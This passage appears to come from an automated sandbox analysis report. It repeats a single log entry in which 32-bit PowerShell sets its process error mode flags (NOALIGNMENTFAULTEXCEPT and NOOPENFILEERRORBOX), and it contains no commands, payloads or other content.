Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
